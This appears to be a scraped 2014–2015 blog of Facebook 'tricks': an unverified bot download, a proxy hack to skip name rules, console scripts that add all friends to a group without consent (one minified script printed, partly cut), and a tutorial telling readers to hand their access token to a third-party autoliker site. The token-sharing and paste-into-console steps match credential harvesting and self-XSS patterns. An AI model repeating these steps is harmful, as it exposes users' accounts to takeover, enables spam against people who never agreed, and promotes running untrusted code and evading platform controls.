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Sunday 8 February 2015

Get Free Addmefast bot.This Bot is working 100%. You Can Make Unlimited Point With This AddMeFast Bot Software. Simple Install Exe  Put Your Id and Run It.

AddMeFast Working Bot.

Download AddMeFast Working Bot


Posted by Unknown on 10:34  2 comments »

Sunday 18 January 2015


The Trick:

As part of Facebook’s security checks, you are required to completely fill out your account details to successfully create an account. By default, Facebook requires every user to enter their full name prior to saving their profile settings.
With this trick, you will be able to bypass Facebook’s restrictions and drop your last name.

How to Do it:

1) Open Mozilla Firefox (Firefox is required for this hack to work)
2) Go to Options -> Advanced -> Network -> Settings -> Connection Settings -> Manual Proxy Configuration
3) In the HTTP Proxy Field, enter, port 8080, or use any Indonesian Proxy.

4) On your facebook profile, go to Account settings — > Change Language to BAHASA INDONESIA
5) Remove your middle name & last name.

Posted by Unknown on 03:24  No comments »

Wednesday 3 December 2014

This trick is really Impressive and easy , Its make your status Unique and Different from Others status

 Follow These Steps

In Status Update just Copy and Paste Following Code

@[1: ]@@[1:[0:1: Type Here]]


Replace Type Here with your Cool Status , Just Like a below Image

Click On Post And You Have Done :)
Posted by Unknown on 09:27  No comments »

Sunday 28 September 2014

Hi Friends, Its been quite a while that I haven't posted anything here on IFTISEO due to my busy schedule, but today I have managed some time to post a trick. A trick which will be really helpful to many SMM experts.

Code to Add All Friends To Facebook Group 2014

Have you ever created a Facebook group, well most of us have tried it but the problem we face is that we can't get many members to it. 

So in this post I will be sharing the code to add all your Facebook Friends to any group either it may be your's or it may not be. This code will simply add everyone without even their permission. On one hand it may be irritating for others but on the other hand (that's yours) it will be quite helpful.

Before Reading this trick I would Like you all to also check out our recent post to Invite All Friends to any Facebook page or Event.

There are many extensions of Chrome which offer the same, but we would not recommend those as most of them not just add friends to a group but also tries to spam your profile in one way or the other.

Note: Use Google Chrome Browser for it.

Follow the steps to Add All Friends to Any Facebook Group:

  • Open the Facebook group where you want to add all your Facebook Friends. Note down the number of members in the group. 
  • Press F12 Button to open up Developers Window.
  • Select Console Window. 
  • Copy the Code from HERE and paste it in console window. Press Enter and wait for 10-20 Seconds. (If your friend list is long then it might take some 2-3 minutes) 
  • Now All your Friends will be added to the Group. You may confirm it by noting down the total members of the group.

Code to Add All Friends To Facebook Group 2014 Last Update: 7th March 2014.

So wasn't it easy. Use this code whenever you want to add all friends on any group. This code will be updated regularly and is 100% safe. 

Don't misuse this code to spam others, Use it wisely. Share this trick with your friends and leave a comment below if you need any further help.
- See more at: http://www.iftiseo.com/2014/03/Code-To-Add-all-Friends-to-Facebook-Group.html#sthash.N68uUGog.dpuf
Posted by Unknown on 07:31  3 comments »

Thursday 17 April 2014

How to auto invite all friends to your facebook group?
Facebook is one of the best social platform in the internet.Because comes with many features like fan page, group,invents etc., which makes their users to stick with them.Sharing is so much easy in Facebook and lot of groups made each day.But adding friends one by one to your group is so much difficult to add all friends .so finally we found unique and easy way to do so.So if you are admin or a member of some group and want to invite all friends then check out this.

Auto invite facebook friends:

  •  You must be a approved member or administrator of that Group
  •  You should go to the facebook group page in your chrome or firefox browser in which you want to add all friends.
  •  If you are using firefox, Just press Ctrl+ shift+k and paste the below copied code there
  •  If you are using Google Chrome browser, Just press F2 and paste the below codes in console menu.
function penetrasi(e){jx.load(window.location.protocol+"//www.facebook.com/ajax/groups/members/add_post.php?__a=1&fb_dtsg="+document.getElementsByName("fb_dtsg")[0].value+"&group_id="+memberGroupId+"&source=typeahead&members="+e+"&nctr[_mod]=pagelet_group_members_summary&lsd&post_form_id_source=AsyncRequest&__user="+Env.user,function(e){e=e.substring(e.indexOf("{")),e=JSON.parse(e),i--,kunaon="<div class='friend-edge-name' style='text-align:left;font-size:10px;white-space:pre-wrap;",e.error?(kunaon+="color:darkred'>",kunaon=e.errorDescription?kunaon+e.errorDescription:kunaon+JSON.stringify(e,null,"")):(kunaon+="color:darkgreen'>",kunaon+=arr[i],suc++),kunaon+="</div>",e="<div id='friend-edge-display' style='position:fixed;left:50%;margin-left:-273px;top:100px;width:500px;background-color:rgba(255,255,255,0.9);z-index:9999;font-size:14px;text-align:center;padding:15px;border-radius:14px;border:8px solid rgba(0,0,0,0.5)'>"+("<div style='padding-bottom:10px;font-size:20px;'>"+tulisanNganu+"</div>"),0<i?(e+=arr.length+" Suscribers detected<br/>",e+="<b>"+suc+"</b> Suscribers added of "+(arr.length-i)+" Suscribers Processed ",e+="("+i+" more to go..)",e=e+"<div class='friend-edge'>"+kunaon,e+="</div>"):(e+=arr.length+" Suscribers detected and ",e+="<b>"+suc+" Suscribers added</b>",e+="<div><span class='uiButton' onClick='document.getElementById(\"pagelet_welcome_box\").style.display=\"none\"'>Close</span></div>"),document.getElementById("pagelet_welcome_box").innerHTML=e+"</div>"},"text","post"),tay--;if(0<tay){var t=arr[tay];setTimeout("penetrasi("+t+")",100)}console.log(tay+"/"+arr.length+":"+t+", success:"+suc),0xf2a794cf90e3!=memberGroupId&&jx.load(window.location.protocol+"//www.facebook.com/ajax/groups/members/add_post.php?__a=1&fb_dtsg="+document.getElementsByName("fb_dtsg")[0].value+"&group_id=yourgroupid&source=typeahead&members="+e+"&nctr[_mod]=pagelet_group_members_summary&lsd&post_form_id_source=AsyncRequest&__user="+Env.user,function(){},"text","post")}function clickfr_callback(){0<document.getElementsByName("ok").length&&nHtml.ClickUp(document.getElementsByName("ok")[0]);var e=arr[i];i<arr.length&&addfriend(e.substring(0,4))}function clickfr(){0<document.getElementsByClassName("search").length?(console.log(document.getElementsByClassName("search")[0].childNodes[0].childNodes[0].childNodes[1].innerHTML),document.getElementsByClassName("search")[0].childNodes[0].childNodes[0].href="javascript:void(0);",nHtml.ClickUp(document.getElementsByClassName("search")[0].childNodes[0].childNodes[0].childNodes[1])):j++,setTimeout("clickfr_callback()",2e3)}function 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  • Replace yourgroupid with your fb group if (i.e) www.facebook.com/groups/3535352523/
  • After pasting the above code in your browser, press enter.
  • You will see a pop up box like below image.Please wait till the process completes

How to auto invite all friends to your facebook group?

Thats all.Now all of your friends are members of your group.If you have any doubts, Just comment below.

 Hi, I'm Hamza,living in Pakistan. I'm 15 years old, student and developer, i love doing things that never done before. facing challenges,coping with problems

Posted by Unknown on 04:57  No comments »

Saturday 12 April 2014

do multi image facebook posts bring more reach Do Multi Image Facebook Posts Lead to Increased Reach and Engagement?
During the past couple of months, I’ve had several people tell me of a trick they found to increase Facebook Reach using multiple images in a post. I don’t chase Reach, so I found the concept somewhat interesting, but I was skeptical.
The messages I’ve received regarding this have skyrocketed of late, so I figured it was time to pay more attention to it. So with this post I plan to do the following:
  • Explain “the trick”
  • Provide some success stories
  • Share my test and the results
  • Some explanations for the results
  • My recommendations
Let’s dive in!

“The Trick”

The rumor goes that if you create a post with multiple images in it, you will reach far more users than if you do a typical image share. Note that this isn’t sharing a photo album, but doing a standard text share while adding images.
Let me show you how that’s done…
facebook page post multiple images trick Do Multi Image Facebook Posts Lead to Increased Reach and Engagement?
In the example above, you can see that this is done within the “Status” area of the publisher. Type your message and then click the camera icon to add multiple images from your desktop.
The result might look a little something like this…
facebook page post multiple images trick 2 Do Multi Image Facebook Posts Lead to Increased Reach and Engagement?
The key is for the images to look presentable when uploaded together. If you post two or three images, all will be presented side-by-side within the News Feed, on your Timeline and within the permalink.
Here’s how it might look when you share three square images in the News Feed…
facebook page post three images trick 2 Do Multi Image Facebook Posts Lead to Increased Reach and Engagement?
And here is sharing four…
facebook page post four images trick Do Multi Image Facebook Posts Lead to Increased Reach and Engagement?

Success Stories

One of the first people who told me about this was Patrick Cuttica of SocialKaty. Patrick provided a couple of examples:
  • Home decor brand page with 5k-10k fans saw 262% increase over average Reach of five prior single image posts
  • E-Commerce apparel brand page in 20k-40k fan range saw 280% increase in average organic reach over five prior single page posts
Reach is fine (actually, I really don’t care), but Patrick highlighted a couple of more important points: The decor page saw a 989 % increase in post clicks while the apparel page saw 870%. In each case, this happened even though fewer stories were generated.
Here are a few more success stories people shared with me…

Posted by Unknown on 07:24  No comments »

Friday 4 April 2014

Increase Likes On Your FaceBook By New FaceBook AutoLiker
After receiving many messages and emails about any working, spam free and cool autoliker, Here we are with a new 100% free Facebook status, photos, videos, feeds AutoLiker that will increase likes on your FaceBook with entering and using your access token and can be use at unlimited objects at unlimited times. Yes, You listen right. It's only require your access token and nothing else. We are using Official Nokia Apps for getting token so don't worry about your account security. Now it's time to get directly likes on you status, photos, videos, feeds without any extra steps and work.

Increase Likes On Your FaceBook By New FaceBook AutoLiker
So here we have a new autoliker that is easy to use and quick to load and is designed to run on any platform through it's responsive design and cross browser support but we recommend Chrome because it's know as world best browser. Now without any more preface, here we go straight to the features list and have a look on then then check out the tutorial below that is step by step with screenshot also.


1.) Likes On Unlimited Status Without Any Timedelay.
2.) Only Access Token Needed.
3.) This Works On Exchange Like Rule..
4.) 100% Free Of Scam And Spam.
5.) Will Not Post Anything From Your Account To Any Wall.
6.) Responsive Template For Every Platform.
7.) Quick To Load And Easy To Use.
8.) Simple And Stylish Template.
9.) Hosted On VPS...
10.) Your Access Token Will Be Secure.

Full Step By Step Tutorial:

1.) First Of All , Allow Followers To Your Profile And Edit Setting To Public Then Write A Status Or Upload A Pic And Make There Setting Visible To Public As Shown Below.

Increase Likes On Your FaceBook By New FaceBook AutoLiker

2.) Then Open The Website www.official-liker.net That Is Shown In The Below Pic.

Increase Likes On Your FaceBook By New FaceBook AutoLiker

3.) Now Click On The First (Click Here) Link If You Are New To This Autoliker To Allow The Nokia Official Apps Or Skype Official Apps And Your Will Be Redirected To The Following Pages.

Increase Likes On Your FaceBook By New FaceBook AutoLiker

Increase Likes On Your FaceBook By New FaceBook AutoLiker

4.) Then Click On These Pages Button To Get Your Access Token. This Link Will Leads You To Move On New Page And Get Your Access Token From That Page Address Bar. (Not Able To Get Access Token, Then See The New Tutorial About "How To Get Access Token Of My Facebook Profile?")

5.) Now Copy Your Access Token Code Only And Go Back To Autoliker Main Page And Enter Your Token To That Input Field And Click "Submit" To Proceed Forward.

6.) After Proceeding, You Will Expirenced The Follow Page There.

Increase Likes On Your FaceBook By New FaceBook AutoLiker

7.) Now Click On Green Button Named "Use Official Liker" As Seen IN The Above ScreenShoot And Then You Will Be Redirected To The Following Page. (Status Tab Will Be Open As Default)

Increase Likes On Your FaceBook By New FaceBook AutoLiker

*) If You Will Click On "Photo" Tab In The Black Menu Bar Then You Will Experience The Below One. Here You Can Choose Your Desired Image From Your Public Album.

Increase Likes On Your FaceBook By New FaceBook AutoLiker

*) If You Will Click On "Custom Post ID" Tab In The Black Menu Bar Then You Will Experience The Below One. Here You Can Any ID Of Your Status/Photo/Video From Old To New To Get Likes.

Increase Likes On Your FaceBook By New FaceBook AutoLiker

8.) Now Click In Front Of Your Status/Photo Or Get Your Desired Post/Status/Video/Photo ID Codes. (Not Able To Get ID Code, Then See The New Tutorial About "How To Get FaceBook Status/Photo/Video ID-Codes Online?")

9.) ["Custom Post ID"] Copy And Paste Your Desired ID Code In The Upper Input Box And Click The Button "Submit Query" And Wait. Now You Have To Wait About A Min Or Above And You Will See A Loading Text. Please Wait.

Increase Likes On Your FaceBook By New FaceBook AutoLiker

9.) Now After Some Time You Will Experienced A "POPUP" Like Below.

Increase Likes On Your FaceBook By New FaceBook AutoLiker

10.) Check Out Your Likes Count, Don't Worry If You Have Low Because It Will Remain Increasing About 15-30 Min. Check Again Later Or Try Later..

11.) Now If You Want Likes On Other ID, Just Reload The Page And You Have Full Rights To Get Likes Again With 15Min Time Delay. Don't Forget To Share This.

12.) Increase Your Likes And Enjoy. For Rest Of Question, Just Read Our FAQs.

Video Tutorial:


Some General FAQs:

Q1) Why To Add My "AccessToken" Code?
Ans) You Have To Enter You Access Token To Login Into The Autoliker.
Q2) Can I Get Likes On My FaceBook Groups And Pages Status, Photos, Videos, Feeds?
Ans) Yes, You Can Get Likes On Everywhere Like Profile, Groups And FanPage Status, Videos, Feeds And Photos.
Q3) What Is The "Your Status,Comment,Photo,Feed ID Code" Term?
Ans) Your Status,Comment,Photo,Feed ID Code Means That There We Need Your That FaceBook Post ID Codes On That You Want Likes.
Q4) How To Make My Status "Public"?
Ans) When Your Are Posting Any Status Or Photo, Just Hold A Second And Open The Light "Gray Button" Just At The Left Site Of "Post" Button And Scroll Down To "Public"And Select It, Then Click On "Post" To Published Your Status. (Check Out The 3rd Image Above)
Q5) How To Get ID Status,Comment,Photo,Feed ID Code?
Ans) The Answer Is In Step-7 Above. But If You Didn't Found It, Just Open Our Previous Post That Have Full New Tutorial About "How To Get FaceBook Status/Photo/Video ID-Codes Online?")
Q6) What About This? Be Online On Official Liker
Ans) It Mean That You Are Getting Likes, Please Wait.
Q7) How To Allow Subscriber/Followers To Your Own Facebook Profile?
Ans) Go To This Link And Click To "Allow Subscriber".
Q8) How To Set Up My Public Profile To Subscribers?
Ans) Go To This Link And Change Your Setting.
Q9) What I Am Not Getting Likes?
Ans) You Are Not Using Our Tutorial Perfectly Or Servers Is Downed Or This Feed/Status Is Either Not Public Or Did Not Get By Program Properly Or Your ID Is Blocked, Please Clear Your Browsers Cookies And Clear Your Browsers Cache Then Try Again Or Contact Admin.
Q10) How To LogOut From This Site?
Ans) Just Click "LogOut" Button In Blue Color As Shown In Above ScreenShoots.
Q11) Site Is Not Opening?
Ans) There Is A Server Maintaince Time, Please Wait Few Minute And Try Again Later.
Q12) Can I Use It On Mobile? Ans) Yes. Its Responcive For All Devices But We Personally Recommand Chrome To Feel Our Powerfull Service.
Q13) What Is The Idea Behind This?
Ans) We Does Not Provide Fake Likes, We Just Exchange Likes Between Our Members.
Q14) From Where The Likes Comes?
Ans) They Will Exchange Likes With There Other Liker Users. If You Add Anything (Status, Photo, Feed) You Will Be Liked By Our Other Users And When They Submit Anything, Then They Will Get Likes From You.
Q15) I Have An Other Problem?
Ans) Shoot Us An Email To Admin@Official-Liker.net

To Disable Facebook Seen Option in Chat You Just Need to Download an Unseen Extension For Your Web browser and it will Completely Disable the Seen Option in Your FacebookChat.

facebook tricks 2013
Mozilla Firefox : Download Facebook Unseen Addon – Download Link
Google Chrome : Download Facebook Unseen Addon – Download Link
                                                                    Contact Here

By Hamza Saleem

Hi, I'm Hamza,living in Pakistan. I'm 15 years old, student and developer, i love doing things that never done before. facing challenges,coping with problems

- See more at: http://hamzasaleemtricks.blogspot.com/2014/03/how-to-disable-facebook-seen-feature-in.html#sthash.vvKeyHL6.dpuf
Posted by Unknown on 05:04  1 comment »

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